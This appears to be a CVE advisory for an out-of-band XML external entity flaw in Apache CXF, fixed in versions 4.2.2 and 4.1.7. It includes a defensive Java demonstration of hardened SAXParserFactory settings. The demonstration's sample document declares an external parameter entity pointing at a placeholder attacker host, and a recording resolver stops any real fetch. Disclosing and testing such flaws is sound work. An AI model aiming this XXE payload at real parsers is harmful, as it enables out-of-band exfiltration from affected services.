Description

Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue.
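The description refers to a SAXParserFactory built with JAXP defaults, which lets a DOCTYPE reference external DTDs and entities. The following is an added example, not Apache CXF code, showing the JAXP hardening the fix applies: a defaults-only factory next to a hardened one, parsed against a constructed document whose DTD points at an external resource. A recording EntityResolver stands in for the network, so the demonstration shows whether the parser even tries to resolve the reference without actually fetching anything. The hostname `attacker.invalid` is a placeholder.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

public class SaxFactoryHardening {

    // Factory as JAXP creates it by default: external DTDs and entities are resolved.
    public static SAXParserFactory defaultFactory() {
        return SAXParserFactory.newInstance();
    }

    // Hardened factory: the standard JAXP/Xerces settings that stop external entity resolution.
    public static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setXIncludeAware(false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Rejecting the DOCTYPE entirely is the strongest setting; drop only this line
        // if the application must accept documents that carry a DTD.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f;
    }

    // Constructed sample document: its internal DTD subset declares an external parameter
    // entity. Resolving it would be the out-of-band request the CVE describes.
    public static final String SAMPLE_XML =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE doc [ <!ENTITY % ext SYSTEM \"http://attacker.invalid/x.dtd\"> %ext; ]>\n"
      + "<doc/>";

    // Handler that records every external resolution attempt instead of performing it.
    static final class RecordingHandler extends DefaultHandler {
        final List<String> resolved = new ArrayList<>();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            resolved.add(systemId);
            return new InputSource(new StringReader("")); // empty replacement, no network
        }
    }

    // Returns the system ids the parser tried to resolve while parsing xml with factory f.
    public static List<String> resolutionAttempts(SAXParserFactory f, String xml) throws Exception {
        RecordingHandler h = new RecordingHandler();
        SAXParser parser = f.newSAXParser();
        try {
            parser.parse(new InputSource(new StringReader(xml)), h);
        } catch (org.xml.sax.SAXException e) {
            // The hardened parser rejects the DOCTYPE before resolving anything.
        }
        return h.resolved;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default:  " + resolutionAttempts(defaultFactory(), SAMPLE_XML));
        System.out.println("hardened: " + resolutionAttempts(hardenedFactory(), SAMPLE_XML));
    }
}
```

With the default factory the recorded list contains the external DTD's system id, i.e. the parser reached out for it; with the hardened factory the list stays empty because the DOCTYPE is rejected before any resolution. If an application cannot reject DOCTYPEs outright, keep the other four settings; together they disable external general and parameter entities and the external DTD subset, which is what closes the out-of-band channel. Any parser in the code base that is built by a bare `SAXParserFactory.newInstance()` without these calls is worth auditing for the same issue.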

PUBLISHED Reserved 2026-06-02 | Published 2026-06-12 | Updated 2026-06-15 | Assigner apache

Problem types

CWE-611 Improper Restriction of XML External Entity Reference

Product status

Default status: unaffected

4.2.0 (semver) before 4.2.2: affected

Any version before 4.1.7: affected

Credits

Venkatraman Kumar (r3dw0lfsec), Securin (finder)

References

www.openwall.com/lists/oss-security/2026/06/11/2

lists.apache.org/thread/3kb9w5bg90xcp06fccoz9k3gpsvyy79o vendor-advisory

cve.org (CVE-2026-49875)

nvd.nist.gov (CVE-2026-49875)